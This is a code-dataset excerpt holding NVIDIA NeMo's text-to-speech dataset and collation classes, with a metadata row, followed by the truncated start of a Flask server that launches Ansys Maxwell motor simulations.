log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
)
def __len__(self):
return len(self.data)
def join_data(self, data_dict):
result = []
for data_type in MAIN_DATA_TYPES + self.sup_data_types:
result.append(data_dict[data_type.name])
if issubclass(data_type, WithLens):
result.append(data_dict[f"{data_type.name}_lens"])
return tuple(result)
def general_collate_fn(self, batch):
(
_,
audio_lengths,
_,
tokens_lengths,
_,
log_mel_lengths,
durations_list,
duration_priors_list,
pitches,
pitches_lengths,
energies,
energies_lengths,
_,
) = zip(*batch)
max_audio_len = max(audio_lengths).item()
max_tokens_len = max(tokens_lengths).item()
max_log_mel_len = max(log_mel_lengths) if LogMel in self.sup_data_types_set else None
max_durations_len = max([len(i) for i in durations_list]) if Durations in self.sup_data_types_set else None
max_pitches_len = max(pitches_lengths).item() if Pitch in self.sup_data_types_set else None
max_energies_len = max(energies_lengths).item() if Energy in self.sup_data_types_set else None
if LogMel in self.sup_data_types_set:
log_mel_pad = torch.finfo(batch[0][2].dtype).tiny
duration_priors = (
torch.zeros(
len(duration_priors_list),
max([prior_i.shape[0] for prior_i in duration_priors_list]),
max([prior_i.shape[1] for prior_i in duration_priors_list]),
)
if DurationPrior in self.sup_data_types_set
else []
)
audios, tokens, log_mels, durations_list, pitches, energies, speaker_ids = [], [], [], [], [], [], []
for i, sample_tuple in enumerate(batch):
(
audio,
audio_len,
token,
token_len,
log_mel,
log_mel_len,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = sample_tuple
audio = general_padding(audio, audio_len.item(), max_audio_len)
audios.append(audio)
token = general_padding(token, token_len.item(), max_tokens_len, pad_value=self.text_tokenizer_pad_id)
tokens.append(token)
if LogMel in self.sup_data_types_set:
log_mels.append(general_padding(log_mel, log_mel_len, max_log_mel_len, pad_value=log_mel_pad))
if Durations in self.sup_data_types_set:
durations_list.append(general_padding(durations, len(durations), max_durations_len))
if DurationPrior in self.sup_data_types_set:
duration_priors[i, : duration_prior.shape[0], : duration_prior.shape[1]] = duration_prior
if Pitch in self.sup_data_types_set:
pitches.append(general_padding(pitch, pitch_length.item(), max_pitches_len))
if Energy in self.sup_data_types_set:
energies.append(general_padding(energy, energy_length.item(), max_energies_len))
if SpeakerID in self.sup_data_types_set:
speaker_ids.append(speaker_id)
data_dict = {
"audio": torch.stack(audios),
"audio_lens": torch.stack(audio_lengths),
"text": torch.stack(tokens),
"text_lens": torch.stack(tokens_lengths),
"log_mel": torch.stack(log_mels) if LogMel in self.sup_data_types_set else None,
"log_mel_lens": torch.stack(log_mel_lengths) if LogMel in self.sup_data_types_set else None,
"durations": torch.stack(durations_list) if Durations in self.sup_data_types_set else None,
"duration_prior": duration_priors if DurationPrior in self.sup_data_types_set else None,
"pitch": torch.stack(pitches) if Pitch in self.sup_data_types_set else None,
"pitch_lens": torch.stack(pitches_lengths) if Pitch in self.sup_data_types_set else None,
"energy": torch.stack(energies) if Energy in self.sup_data_types_set else None,
"energy_lens": torch.stack(energies_lengths) if Energy in self.sup_data_types_set else None,
"speaker_id": torch.stack(speaker_ids) if SpeakerID in self.sup_data_types_set else None,
}
return data_dict
def _collate_fn(self, batch):
data_dict = self.general_collate_fn(batch)
joined_data = self.join_data(data_dict)
return joined_data
class MixerTTSDataset(TTSDataset):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def _albert(self):
from transformers import AlbertTokenizer # noqa pylint: disable=import-outside-toplevel
self.lm_model_tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2')
self.lm_padding_value = self.lm_model_tokenizer._convert_token_to_id('<pad>')
space_value = self.lm_model_tokenizer._convert_token_to_id('▁')
self.id2lm_tokens = {}
for i, d in enumerate(self.data):
raw_text = d["raw_text"]
assert isinstance(self.text_tokenizer, EnglishPhonemesTokenizer) or isinstance(
self.text_tokenizer, EnglishCharsTokenizer
)
preprocess_text_as_tts_input = self.text_tokenizer.text_preprocessing_func(raw_text)
lm_tokens_as_ids = self.lm_model_tokenizer.encode(preprocess_text_as_tts_input, add_special_tokens=False)
if self.text_tokenizer.pad_with_space:
lm_tokens_as_ids = [space_value] + lm_tokens_as_ids + [space_value]
self.id2lm_tokens[i] = lm_tokens_as_ids
def add_lm_tokens(self, **kwargs):
lm_model = kwargs.pop('lm_model')
if lm_model == "albert":
self._albert()
else:
raise NotImplementedError(
f"{lm_model} lm model is not supported. Only albert is supported at this moment."
)
def __getitem__(self, index):
(
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = super().__getitem__(index)
lm_tokens = None
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.tensor(self.id2lm_tokens[index]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
lm_tokens,
)
def _collate_fn(self, batch):
batch = list(zip(*batch))
data_dict = self.general_collate_fn(list(zip(*batch[:13])))
lm_tokens_list = batch[13]
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.full(
(len(lm_tokens_list), max([lm_tokens.shape[0] for lm_tokens in lm_tokens_list])),
fill_value=self.lm_padding_value,
)
for i, lm_tokens_i in enumerate(lm_tokens_list):
lm_tokens[i, : lm_tokens_i.shape[0]] = lm_tokens_i
data_dict[LMTokens.name] = lm_tokens
joined_data = self.join_data(data_dict)
return joined_data
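# Illustrative usage sketch (hypothetical manifest, paths and argument values; the
# supplementary-data type strings are assumed to match the add_* methods above):
#
#   from torch.utils.data import DataLoader
#   from nemo.collections.tts.torch.tts_tokenizers import EnglishCharsTokenizer
#
#   dataset = TTSDataset(
#       manifest_filepath="train_manifest.json",   # hypothetical manifest
#       sample_rate=22050,
#       text_tokenizer=EnglishCharsTokenizer(),
#       sup_data_types=["log_mel", "pitch", "duration_prior"],
#       sup_data_path="sup_data",                  # cache for computed features
#       use_beta_binomial_interpolator=True,
#   )
#   loader = DataLoader(dataset, batch_size=16, collate_fn=dataset._collate_fn)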
| # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pickle
from pathlib import Path
from typing import Callable, Dict, List, Optional, Union
import librosa
import torch
from nemo_text_processing.text_normalization.normalize import Normalizer
from tqdm import tqdm
from nemo.collections.asr.parts.preprocessing.features import WaveformFeaturizer
from nemo.collections.tts.torch.helpers import (
BetaBinomialInterpolator,
beta_binomial_prior_distribution,
general_padding,
)
from nemo.collections.tts.torch.tts_data_types import (
DATA_STR2DATA_CLASS,
MAIN_DATA_TYPES,
VALID_SUPPLEMENTARY_DATA_TYPES,
DurationPrior,
Durations,
Energy,
LMTokens,
LogMel,
Pitch,
SpeakerID,
WithLens,
)
from nemo.collections.tts.torch.tts_tokenizers import BaseTokenizer, EnglishCharsTokenizer, EnglishPhonemesTokenizer
from nemo.core.classes import Dataset
from nemo.utils import logging
class TTSDataset(Dataset):
def __init__(
self,
manifest_filepath: str,
sample_rate: int,
text_tokenizer: Union[BaseTokenizer, Callable[[str], List[int]]],
tokens: Optional[List[str]] = None,
text_normalizer: Optional[Union[Normalizer, Callable[[str], str]]] = None,
text_normalizer_call_args: Optional[Dict] = None,
text_tokenizer_pad_id: Optional[int] = None,
sup_data_types: Optional[List[str]] = None,
sup_data_path: Optional[Union[Path, str]] = None,
max_duration: Optional[float] = None,
min_duration: Optional[float] = None,
ignore_file: Optional[str] = None,
trim: bool = False,
n_fft=1024,
win_length=None,
hop_length=None,
window="hann",
n_mels=80,
lowfreq=0,
highfreq=None,
**kwargs,
):
"""Dataset that loads main data types (audio and text) and specified supplementary data types (e.g. log mel, durations, pitch).
        Most supplementary data types will be computed on the fly and saved in sup_data_path if they did not exist before.
Arguments for supplementary data should be also specified in this class and they will be used from kwargs (see keyword args section).
Args:
manifest_filepath (str, Path, List[str, Path]): Path(s) to the .json manifests containing information on the
dataset. Each line in the .json file should be valid json. Note: the .json file itself is not valid
json. Each line should contain the following:
"audio_filepath": <PATH_TO_WAV>
"mel_filepath": <PATH_TO_LOG_MEL_PT> (Optional)
"duration": <Duration of audio clip in seconds> (Optional)
"text": <THE_TRANSCRIPT> (Optional)
sample_rate (int): The sample rate of the audio. Or the sample rate that we will resample all files to.
text_tokenizer (Optional[Union[BaseTokenizer, Callable[[str], List[int]]]]): BaseTokenizer or callable which represents text tokenizer.
tokens (Optional[List[str]]): Tokens from text_tokenizer. Should be specified if text_tokenizer is not BaseTokenizer.
text_normalizer (Optional[Union[Normalizer, Callable[[str], str]]]): Normalizer or callable which represents text normalizer.
text_normalizer_call_args (Optional[Dict]): Additional arguments for text_normalizer function.
text_tokenizer_pad_id (Optional[int]): Index of padding. Should be specified if text_tokenizer is not BaseTokenizer.
sup_data_types (Optional[List[str]]): List of supplementary data types.
sup_data_path (Optional[Union[Path, str]]): A folder that contains or will contain supplementary data (e.g. pitch).
max_duration (Optional[float]): Max duration of audio clips in seconds. All samples exceeding this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
min_duration (Optional[float]): Min duration of audio clips in seconds. All samples lower than this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
ignore_file (Optional[str, Path]): The location of a pickle-saved list of audio_ids (the stem of the audio
files) that will be pruned prior to training. Defaults to None which does not prune.
trim (Optional[bool]): Whether to apply librosa.effects.trim to the audio file. Defaults to False.
n_fft (Optional[int]): The number of fft samples. Defaults to 1024
win_length (Optional[int]): The length of the stft windows. Defaults to None which uses n_fft.
            hop_length (Optional[int]): The hop length between fft computations. Defaults to None which uses n_fft//4.
            window (Optional[str]): One of 'hann', 'hamming', 'blackman', 'bartlett', 'none', corresponding to the
                equivalent torch window function.
n_mels (Optional[int]): The number of mel filters. Defaults to 80.
lowfreq (Optional[int]): The lowfreq input to the mel filter calculation. Defaults to 0.
highfreq (Optional[int]): The highfreq input to the mel filter calculation. Defaults to None.
Keyword Args:
durs_file (Optional[str]): String path to pickled durations location.
            durs_type (Optional[str]): Type of durations. Currently only "aligner-based" durations are supported.
use_beta_binomial_interpolator (Optional[bool]): Whether to use beta-binomial interpolator. Defaults to False.
pitch_fmin (Optional[float]): The fmin input to librosa.pyin. Defaults to librosa.note_to_hz('C2').
pitch_fmax (Optional[float]): The fmax input to librosa.pyin. Defaults to librosa.note_to_hz('C7').
pitch_avg (Optional[float]): The mean that we use to normalize the pitch.
pitch_std (Optional[float]): The std that we use to normalize the pitch.
pitch_norm (Optional[bool]): Whether to normalize pitch (via pitch_avg and pitch_std) or not.
"""
super().__init__()
self.text_normalizer = text_normalizer
self.text_normalizer_call = (
self.text_normalizer.normalize if isinstance(self.text_normalizer, Normalizer) else self.text_normalizer
)
self.text_normalizer_call_args = text_normalizer_call_args if text_normalizer_call_args is not None else {}
self.text_tokenizer = text_tokenizer
if isinstance(self.text_tokenizer, BaseTokenizer):
self.text_tokenizer_pad_id = text_tokenizer.pad
self.tokens = text_tokenizer.tokens
else:
if text_tokenizer_pad_id is None:
raise ValueError(f"text_tokenizer_pad_id must be specified if text_tokenizer is not BaseTokenizer")
if tokens is None:
raise ValueError(f"tokens must be specified if text_tokenizer is not BaseTokenizer")
self.text_tokenizer_pad_id = text_tokenizer_pad_id
self.tokens = tokens
if isinstance(manifest_filepath, str):
manifest_filepath = [manifest_filepath]
self.manifest_filepath = manifest_filepath
if sup_data_path is not None:
Path(sup_data_path).mkdir(parents=True, exist_ok=True)
self.sup_data_path = sup_data_path
self.sup_data_types = (
[DATA_STR2DATA_CLASS[d_as_str] for d_as_str in sup_data_types] if sup_data_types is not None else []
)
self.sup_data_types_set = set(self.sup_data_types)
self.data = []
audio_files = []
total_duration = 0
for manifest_file in self.manifest_filepath:
with open(Path(manifest_file).expanduser(), 'r') as f:
logging.info(f"Loading dataset from {manifest_file}.")
for line in tqdm(f):
item = json.loads(line)
file_info = {
"audio_filepath": item["audio_filepath"],
"mel_filepath": item["mel_filepath"] if "mel_filepath" in item else None,
"duration": item["duration"] if "duration" in item else None,
"text_tokens": None,
"speaker_id": item["speaker"] if "speaker" in item else None,
}
if "text" in item:
text = item["text"]
if self.text_normalizer is not None:
text = self.text_normalizer_call(text, **self.text_normalizer_call_args)
text_tokens = self.text_tokenizer(text)
file_info["raw_text"] = item["text"]
file_info["text_tokens"] = text_tokens
audio_files.append(file_info)
if file_info["duration"] is None:
logging.info(
"Not all audio files have duration information. Duration logging will be disabled."
)
total_duration = None
if total_duration is not None:
total_duration += item["duration"]
logging.info(f"Loaded dataset with {len(audio_files)} files.")
if total_duration is not None:
logging.info(f"Dataset contains {total_duration / 3600:.2f} hours.")
if ignore_file:
logging.info(f"using {ignore_file} to prune dataset.")
with open(Path(ignore_file).expanduser(), "rb") as f:
wavs_to_ignore = set(pickle.load(f))
pruned_duration = 0 if total_duration is not None else None
pruned_items = 0
for item in audio_files:
audio_path = item['audio_filepath']
audio_id = Path(audio_path).stem
# Prune data according to min/max_duration & the ignore file
if total_duration is not None:
if (min_duration and item["duration"] < min_duration) or (
max_duration and item["duration"] > max_duration
):
pruned_duration += item["duration"]
pruned_items += 1
continue
if ignore_file and (audio_id in wavs_to_ignore):
pruned_items += 1
pruned_duration += item["duration"]
wavs_to_ignore.remove(audio_id)
continue
self.data.append(item)
logging.info(f"Pruned {pruned_items} files. Final dataset contains {len(self.data)} files")
if pruned_duration is not None:
logging.info(
f"Pruned {pruned_duration / 3600:.2f} hours. Final dataset contains "
f"{(total_duration - pruned_duration) / 3600:.2f} hours."
)
self.sample_rate = sample_rate
self.featurizer = WaveformFeaturizer(sample_rate=self.sample_rate)
self.trim = trim
self.n_fft = n_fft
self.n_mels = n_mels
self.lowfreq = lowfreq
self.highfreq = highfreq
self.window = window
self.win_length = win_length or self.n_fft
self.hop_length = hop_length
self.hop_len = self.hop_length or self.n_fft // 4
self.fb = torch.tensor(
librosa.filters.mel(
self.sample_rate, self.n_fft, n_mels=self.n_mels, fmin=self.lowfreq, fmax=self.highfreq
),
dtype=torch.float,
).unsqueeze(0)
window_fn = {
'hann': torch.hann_window,
'hamming': torch.hamming_window,
'blackman': torch.blackman_window,
'bartlett': torch.bartlett_window,
'none': None,
}.get(self.window, None)
self.stft = lambda x: torch.stft(
input=x,
n_fft=self.n_fft,
hop_length=self.hop_len,
win_length=self.win_length,
window=window_fn(self.win_length, periodic=False).to(torch.float) if window_fn else None,
)
for data_type in self.sup_data_types:
if data_type not in VALID_SUPPLEMENTARY_DATA_TYPES:
raise NotImplementedError(f"Current implementation of TTSDataset doesn't support {data_type} type.")
getattr(self, f"add_{data_type.name}")(**kwargs)
def add_log_mel(self, **kwargs):
pass
def add_durations(self, **kwargs):
durs_file = kwargs.pop('durs_file')
durs_type = kwargs.pop('durs_type')
audio_stem2durs = torch.load(durs_file)
self.durs = []
for tag in [Path(d["audio_filepath"]).stem for d in self.data]:
durs = audio_stem2durs[tag]
if durs_type == "aligner-based":
self.durs.append(durs)
else:
raise NotImplementedError(
f"{durs_type} duration type is not supported. Only align-based is supported at this moment."
)
def add_duration_prior(self, **kwargs):
self.use_beta_binomial_interpolator = kwargs.pop('use_beta_binomial_interpolator', False)
if self.use_beta_binomial_interpolator:
self.beta_binomial_interpolator = BetaBinomialInterpolator()
def add_pitch(self, **kwargs):
self.pitch_fmin = kwargs.pop("pitch_fmin", librosa.note_to_hz('C2'))
self.pitch_fmax = kwargs.pop("pitch_fmax", librosa.note_to_hz('C7'))
self.pitch_avg = kwargs.pop("pitch_avg", None)
self.pitch_std = kwargs.pop("pitch_std", None)
self.pitch_norm = kwargs.pop("pitch_norm", False)
def add_energy(self, **kwargs):
pass
def add_speaker_id(self, **kwargs):
pass
def get_spec(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.stft(audio)
if spec.dtype in [torch.cfloat, torch.cdouble]:
spec = torch.view_as_real(spec)
spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-9)
return spec
def get_log_mel(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.get_spec(audio)
mel = torch.matmul(self.fb.to(spec.dtype), spec)
log_mel = torch.log(torch.clamp(mel, min=torch.finfo(mel.dtype).tiny))
return log_mel
def __getitem__(self, index):
sample = self.data[index]
audio_stem = Path(sample["audio_filepath"]).stem
features = self.featurizer.process(sample["audio_filepath"], trim=self.trim)
audio, audio_length = features, torch.tensor(features.shape[0]).long()
text = torch.tensor(sample["text_tokens"]).long()
text_length = torch.tensor(len(sample["text_tokens"])).long()
log_mel, log_mel_length = None, None
if LogMel in self.sup_data_types_set:
mel_path = sample["mel_filepath"]
if mel_path is not None and Path(mel_path).exists():
log_mel = torch.load(mel_path)
else:
mel_path = Path(self.sup_data_path) / f"mel_{audio_stem}.pt"
if mel_path.exists():
log_mel = torch.load(mel_path)
else:
log_mel = self.get_log_mel(audio)
torch.save(log_mel, mel_path)
log_mel = log_mel.squeeze(0)
log_mel_length = torch.tensor(log_mel.shape[1]).long()
durations = None
if Durations in self.sup_data_types_set:
durations = self.durs[index]
duration_prior = None
if DurationPrior in self.sup_data_types_set:
if self.use_beta_binomial_interpolator:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = torch.from_numpy(self.beta_binomial_interpolator(mel_len, text_length.item()))
else:
prior_path = Path(self.sup_data_path) / f"pr_{audio_stem}.pt"
if prior_path.exists():
duration_prior = torch.load(prior_path)
else:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = beta_binomial_prior_distribution(text_length, mel_len)
duration_prior = torch.from_numpy(duration_prior)
torch.save(duration_prior, prior_path)
pitch, pitch_length = None, None
if Pitch in self.sup_data_types_set:
pitch_name = (
f"{audio_stem}_pitch_pyin_"
f"fmin{self.pitch_fmin}_fmax{self.pitch_fmax}_"
f"fl{self.win_length}_hs{self.hop_len}.pt"
)
pitch_path = Path(self.sup_data_path) / pitch_name
if pitch_path.exists():
pitch = torch.load(pitch_path).float()
else:
pitch, _, _ = librosa.pyin(
audio.numpy(),
fmin=self.pitch_fmin,
fmax=self.pitch_fmax,
frame_length=self.win_length,
sr=self.sample_rate,
fill_na=0.0,
)
pitch = torch.from_numpy(pitch).float()
torch.save(pitch, pitch_path)
if self.pitch_avg is not None and self.pitch_std is not None and self.pitch_norm:
pitch -= self.pitch_avg
                pitch[pitch == -self.pitch_avg] = 0.0  # Zero out values that were previously zero
pitch /= self.pitch_std
pitch_length = torch.tensor(len(pitch)).long()
energy, energy_length = None, None
if Energy in self.sup_data_types_set:
energy_path = Path(self.sup_data_path) / f"{audio_stem}_energy_wl{self.win_length}_hs{self.hop_len}.pt"
if energy_path.exists():
energy = torch.load(energy_path).float()
else:
spec = self.get_spec(audio)
energy = torch.linalg.norm(spec.squeeze(0), axis=0).float()
torch.save(energy, energy_path)
energy_length = torch.tensor(len(energy)).long()
speaker_id = None
if SpeakerID in self.sup_data_types_set:
speaker_id = torch.tensor(sample["speaker_id"]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
)
def __len__(self):
return len(self.data)
def join_data(self, data_dict):
result = []
for data_type in MAIN_DATA_TYPES + self.sup_data_types:
result.append(data_dict[data_type.name])
if issubclass(data_type, WithLens):
result.append(data_dict[f"{data_type.name}_lens"])
return tuple(result)
def general_collate_fn(self, batch):
(
_,
audio_lengths,
_,
tokens_lengths,
_,
log_mel_lengths,
durations_list,
duration_priors_list,
pitches,
pitches_lengths,
energies,
energies_lengths,
_,
) = zip(*batch)
max_audio_len = max(audio_lengths).item()
max_tokens_len = max(tokens_lengths).item()
max_log_mel_len = max(log_mel_lengths) if LogMel in self.sup_data_types_set else None
max_durations_len = max([len(i) for i in durations_list]) if Durations in self.sup_data_types_set else None
max_pitches_len = max(pitches_lengths).item() if Pitch in self.sup_data_types_set else None
max_energies_len = max(energies_lengths).item() if Energy in self.sup_data_types_set else None
if LogMel in self.sup_data_types_set:
log_mel_pad = torch.finfo(batch[0][2].dtype).tiny
duration_priors = (
torch.zeros(
len(duration_priors_list),
max([prior_i.shape[0] for prior_i in duration_priors_list]),
max([prior_i.shape[1] for prior_i in duration_priors_list]),
)
if DurationPrior in self.sup_data_types_set
else []
)
audios, tokens, log_mels, durations_list, pitches, energies, speaker_ids = [], [], [], [], [], [], []
for i, sample_tuple in enumerate(batch):
(
audio,
audio_len,
token,
token_len,
log_mel,
log_mel_len,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = sample_tuple
audio = general_padding(audio, audio_len.item(), max_audio_len)
audios.append(audio)
token = general_padding(token, token_len.item(), max_tokens_len, pad_value=self.text_tokenizer_pad_id)
tokens.append(token)
if LogMel in self.sup_data_types_set:
log_mels.append(general_padding(log_mel, log_mel_len, max_log_mel_len, pad_value=log_mel_pad))
if Durations in self.sup_data_types_set:
durations_list.append(general_padding(durations, len(durations), max_durations_len))
if DurationPrior in self.sup_data_types_set:
duration_priors[i, : duration_prior.shape[0], : duration_prior.shape[1]] = duration_prior
if Pitch in self.sup_data_types_set:
pitches.append(general_padding(pitch, pitch_length.item(), max_pitches_len))
if Energy in self.sup_data_types_set:
energies.append(general_padding(energy, energy_length.item(), max_energies_len))
if SpeakerID in self.sup_data_types_set:
speaker_ids.append(speaker_id)
data_dict = {
"audio": torch.stack(audios),
"audio_lens": torch.stack(audio_lengths),
"text": torch.stack(tokens),
"text_lens": torch.stack(tokens_lengths),
"log_mel": torch.stack(log_mels) if LogMel in self.sup_data_types_set else None,
"log_mel_lens": torch.stack(log_mel_lengths) if LogMel in self.sup_data_types_set else None,
"durations": torch.stack(durations_list) if Durations in self.sup_data_types_set else None,
"duration_prior": duration_priors if DurationPrior in self.sup_data_types_set else None,
"pitch": torch.stack(pitches) if Pitch in self.sup_data_types_set else None,
"pitch_lens": torch.stack(pitches_lengths) if Pitch in self.sup_data_types_set else None,
"energy": torch.stack(energies) if Energy in self.sup_data_types_set else None,
"energy_lens": torch.stack(energies_lengths) if Energy in self.sup_data_types_set else None,
"speaker_id": torch.stack(speaker_ids) if SpeakerID in self.sup_data_types_set else None,
}
return data_dict
def _collate_fn(self, batch):
data_dict = self.general_collate_fn(batch)
joined_data = self.join_data(data_dict)
return joined_data
class MixerTTSDataset(TTSDataset):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def _albert(self):
from transformers import AlbertTokenizer # noqa pylint: disable=import-outside-toplevel
self.lm_model_tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2')
self.lm_padding_value = self.lm_model_tokenizer._convert_token_to_id('<pad>')
space_value = self.lm_model_tokenizer._convert_token_to_id('▁')
self.id2lm_tokens = {}
for i, d in enumerate(self.data):
raw_text = d["raw_text"]
assert isinstance(self.text_tokenizer, EnglishPhonemesTokenizer) or isinstance(
self.text_tokenizer, EnglishCharsTokenizer
)
preprocess_text_as_tts_input = self.text_tokenizer.text_preprocessing_func(raw_text)
lm_tokens_as_ids = self.lm_model_tokenizer.encode(preprocess_text_as_tts_input, add_special_tokens=False)
if self.text_tokenizer.pad_with_space:
lm_tokens_as_ids = [space_value] + lm_tokens_as_ids + [space_value]
self.id2lm_tokens[i] = lm_tokens_as_ids
def add_lm_tokens(self, **kwargs):
lm_model = kwargs.pop('lm_model')
if lm_model == "albert":
self._albert()
else:
raise NotImplementedError(
f"{lm_model} lm model is not supported. Only albert is supported at this moment."
)
def __getitem__(self, index):
(
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = super().__getitem__(index)
lm_tokens = None
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.tensor(self.id2lm_tokens[index]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
lm_tokens,
)
def _collate_fn(self, batch):
batch = list(zip(*batch))
data_dict = self.general_collate_fn(list(zip(*batch[:13])))
lm_tokens_list = batch[13]
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.full(
(len(lm_tokens_list), max([lm_tokens.shape[0] for lm_tokens in lm_tokens_list])),
fill_value=self.lm_padding_value,
)
for i, lm_tokens_i in enumerate(lm_tokens_list):
lm_tokens[i, : lm_tokens_i.shape[0]] = lm_tokens_i
data_dict[LMTokens.name] = lm_tokens
joined_data = self.join_data(data_dict)
return joined_data
| en | 0.769194 | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Dataset that loads main data types (audio and text) and specified supplementary data types (e.g. log mel, durations, pitch). Most supplementary data types will be computed on the fly and saved in the supplementary_folder if they did not exist before. Arguments for supplementary data should be also specified in this class and they will be used from kwargs (see keyword args section). Args: manifest_filepath (str, Path, List[str, Path]): Path(s) to the .json manifests containing information on the dataset. Each line in the .json file should be valid json. Note: the .json file itself is not valid json. Each line should contain the following: "audio_filepath": <PATH_TO_WAV> "mel_filepath": <PATH_TO_LOG_MEL_PT> (Optional) "duration": <Duration of audio clip in seconds> (Optional) "text": <THE_TRANSCRIPT> (Optional) sample_rate (int): The sample rate of the audio. Or the sample rate that we will resample all files to. text_tokenizer (Optional[Union[BaseTokenizer, Callable[[str], List[int]]]]): BaseTokenizer or callable which represents text tokenizer. tokens (Optional[List[str]]): Tokens from text_tokenizer. Should be specified if text_tokenizer is not BaseTokenizer. text_normalizer (Optional[Union[Normalizer, Callable[[str], str]]]): Normalizer or callable which represents text normalizer. text_normalizer_call_args (Optional[Dict]): Additional arguments for text_normalizer function. text_tokenizer_pad_id (Optional[int]): Index of padding. Should be specified if text_tokenizer is not BaseTokenizer. sup_data_types (Optional[List[str]]): List of supplementary data types. sup_data_path (Optional[Union[Path, str]]): A folder that contains or will contain supplementary data (e.g. pitch). max_duration (Optional[float]): Max duration of audio clips in seconds. All samples exceeding this will be pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load audio to compute duration. Defaults to None which does not prune. min_duration (Optional[float]): Min duration of audio clips in seconds. All samples lower than this will be pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load audio to compute duration. Defaults to None which does not prune. ignore_file (Optional[str, Path]): The location of a pickle-saved list of audio_ids (the stem of the audio files) that will be pruned prior to training. Defaults to None which does not prune. trim (Optional[bool]): Whether to apply librosa.effects.trim to the audio file. Defaults to False. n_fft (Optional[int]): The number of fft samples. Defaults to 1024 win_length (Optional[int]): The length of the stft windows. Defaults to None which uses n_fft. hop_length (Optional[int]): The hope length between fft computations. Defaults to None which uses n_fft//4. window (Optional[str]): One of 'hann', 'hamming', 'blackman','bartlett', 'none'. 
Which corresponds to the equivalent torch window function. n_mels (Optional[int]): The number of mel filters. Defaults to 80. lowfreq (Optional[int]): The lowfreq input to the mel filter calculation. Defaults to 0. highfreq (Optional[int]): The highfreq input to the mel filter calculation. Defaults to None. Keyword Args: durs_file (Optional[str]): String path to pickled durations location. durs_type (Optional[str]): Type of durations. Currently supported only "aligned-based". use_beta_binomial_interpolator (Optional[bool]): Whether to use beta-binomial interpolator. Defaults to False. pitch_fmin (Optional[float]): The fmin input to librosa.pyin. Defaults to librosa.note_to_hz('C2'). pitch_fmax (Optional[float]): The fmax input to librosa.pyin. Defaults to librosa.note_to_hz('C7'). pitch_avg (Optional[float]): The mean that we use to normalize the pitch. pitch_std (Optional[float]): The std that we use to normalize the pitch. pitch_norm (Optional[bool]): Whether to normalize pitch (via pitch_avg and pitch_std) or not. # Prune data according to min/max_duration & the ignore file # Zero out values that were perviously zero # noqa pylint: disable=import-outside-toplevel | 1.519666 | 2 |
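The record above (id 8088) documents a JSON-lines manifest in which each line is a standalone JSON object. Purely as an illustration of that documented shape — the path and transcript below are invented, not taken from NeMo — a compatible manifest entry could be produced like this:

import json

# Hypothetical manifest entry, using only keys named in the docstring above:
# "audio_filepath" (required), plus the optional "duration" and "text".
entry = {
    "audio_filepath": "wavs/sample_0001.wav",  # invented path
    "duration": 2.73,                          # clip length in seconds
    "text": "an example transcript",           # invented transcript
}

# One JSON object per line; the manifest file as a whole is not valid JSON.
with open("train_manifest.json", "a", encoding="utf-8") as manifest:
    manifest.write(json.dumps(entry) + "\n")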
anmotordesign/server.py | MarkWengSTR/ansys-maxwell-online | 8 | 8089 | from flask import Flask, request, jsonify
from flask_cors import CORS
from run import run_ansys
from api.validate import spec_present, data_type_validate, spec_keys_validate, ansys_overload_check
ansys_processing_count = 0
# debug
# import ipdb; ipdb.set_trace()
app = Flask(__name__)
CORS(app) # local development cors
@app.route('/run_simu', methods=["POST"])
def run_simulation():
global ansys_processing_count
ansys_processing_count += 1
ctx = {
"request": request.get_json(),
"allow_run": True,
"process": {
"limit": 4,
"count": ansys_processing_count,
},
"start_run_response": {"msg": "start run at background"},
"error": {
"validate": {"msg": ""}
}
}
if spec_present(ctx) and \
data_type_validate(ctx) and \
spec_keys_validate(ctx) and \
ansys_overload_check(ctx):
